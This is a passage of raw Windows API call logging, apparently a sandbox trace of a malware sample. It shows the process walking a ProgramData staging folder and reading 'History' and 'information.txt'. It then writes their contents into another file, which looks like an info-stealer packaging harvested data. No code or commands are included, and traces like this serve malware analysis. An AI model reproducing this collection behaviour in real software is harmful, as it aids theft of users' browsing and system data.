lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x37) returned 0x38ea518 [0116.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", cchWideChar=55, lpMultiByteStr=0x38ea518, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", lpUsedDefaultChar=0x0) returned 55 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0116.440] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea518 | out: hHeap=0x29a0000) returned 1 [0116.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\History", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aac48 [0116.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\History", cchWideChar=9, lpMultiByteStr=0x29aac48, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\History", lpUsedDefaultChar=0x0) returned 9 [0116.440] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0116.441] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\history"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.441] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\history")) returned 0 [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0116.441] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x356692dc, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x356692dc, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x35e80585, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x12e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="information.txt", cAlternateFileName="INFORM~1.TXT")) returned 1 [0116.441] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.441] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.441] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="information.txt" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt" [0116.441] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.441] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.441] lstrcatW (in: lpString1="\\", lpString2="information.txt" | out: lpString1="\\information.txt") returned="\\information.txt" [0116.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0116.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2df8 [0116.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt", cchWideChar=63, lpMultiByteStr=0x29a2df8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt", lpUsedDefaultChar=0x0) returned 63 [0116.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28e8 [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a69d8 [0116.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a69d8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69d8 | out: hHeap=0x29a0000) returned 1 [0116.442] PathMatchSpecW (pszFile="information.txt", pszSpec="*.*") returned 1 [0116.442] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.442] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f78 [0116.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0116.442] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2cd8 [0116.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt", cchWideChar=63, lpMultiByteStr=0x29a2cd8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt", lpUsedDefaultChar=0x0) returned 63 [0116.442] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b70 [0116.442] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0116.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\information.txt", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.442] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x11) returned 0x3970ca0 [0116.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\information.txt", cchWideChar=17, lpMultiByteStr=0x3970ca0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\information.txt", lpUsedDefaultChar=0x0) returned 17 [0116.442] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0116.442] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0116.442] GetLastError () returned 0x5 [0116.442] SetLastError (dwErrCode=0x5) [0116.442] GetLastError () returned 0x5 [0116.442] SetLastError (dwErrCode=0x5) [0116.442] GetLastError () returned 0x5 [0116.442] SetLastError (dwErrCode=0x5) [0116.442] GetLastError () returned 0x5 [0116.442] SetLastError (dwErrCode=0x5) [0116.442] GetLastError () returned 0x5 [0116.442] SetLastError (dwErrCode=0x5) [0116.442] GetLastError () returned 0x5 [0116.442] SetLastError (dwErrCode=0x5) [0116.442] GetLastError () returned 0x5 [0116.443] SetLastError (dwErrCode=0x5) [0116.443] GetLastError () returned 0x5 [0116.443] SetLastError (dwErrCode=0x5) [0116.443] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\information.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\information.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0116.443] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe9 [0116.443] GetFileInformationByHandle (in: hFile=0x28, lpFileInformation=0x19e7dc | out: lpFileInformation=0x19e7dc) returned 1 [0116.443] GetFileSize (in: hFile=0x28, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12e8 [0116.443] SetFilePointer (in: hFile=0x28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.443] ReadFile (in: hFile=0x28, lpBuffer=0x19e7bc, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x19e7c0, lpOverlapped=0x0 | out: lpBuffer=0x19e7bc*, lpNumberOfBytesRead=0x19e7c0*=0x2, lpOverlapped=0x0) returned 1 [0116.443] SetFilePointer (in: hFile=0x28, lDistanceToMove=36, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24 [0116.443] ReadFile (in: hFile=0x28, lpBuffer=0x19e7c8, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19e7c0, lpOverlapped=0x0 | out: lpBuffer=0x19e7c8*, lpNumberOfBytesRead=0x19e7c0*=0x4, lpOverlapped=0x0) returned 1 [0116.443] FileTimeToSystemTime (in: lpFileTime=0x19e79c, lpSystemTime=0x19e784 | out: lpSystemTime=0x19e784) returned 1 [0116.443] SetFilePointer (in: hFile=0x28, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.443] WriteFile (in: hFile=0x358, lpBuffer=0x19e873*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e873*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.443] WriteFile (in: hFile=0x358, lpBuffer=0x19e873*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e873*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.444] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.445] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.446] WriteFile (in: hFile=0x358, lpBuffer=0x19e9f4*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e9f4*, lpNumberOfBytesWritten=0x19e850*=0x10, lpOverlapped=0x0) returned 1 [0116.447] WriteFile (in: hFile=0x358, lpBuffer=0x19ec0c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19ec0c*, lpNumberOfBytesWritten=0x19e850*=0x11, lpOverlapped=0x0) returned 1 [0116.447] GetDesktopWindow () returned 0x10010 [0116.447] GetTickCount () returned 0x123099d [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.448] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.448] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.448] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.448] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.448] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.448] ReadFile (in: hFile=0x28, lpBuffer=0x390a998, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x390a998*, lpNumberOfBytesRead=0x19e838*=0x12e8, lpOverlapped=0x0) returned 1 [0116.449] ReadFile (in: hFile=0x28, lpBuffer=0x390bc80, nNumberOfBytesToRead=0xed18, lpNumberOfBytesRead=0x19e818, lpOverlapped=0x0 | out: lpBuffer=0x390bc80*, lpNumberOfBytesRead=0x19e818*=0x0, lpOverlapped=0x0) returned 1 [0116.449] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x6ec, lpNumberOfBytesWritten=0x19e804, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19e804*=0x6ec, lpOverlapped=0x0) returned 1 [0116.452] CloseHandle (hObject=0x28) returned 1 [0116.452] SetFilePointer (in: hFile=0x358, lDistanceToMove=233, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe9 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e873*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e873*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e873*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e873*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.452] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.453] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.454] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.454] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, 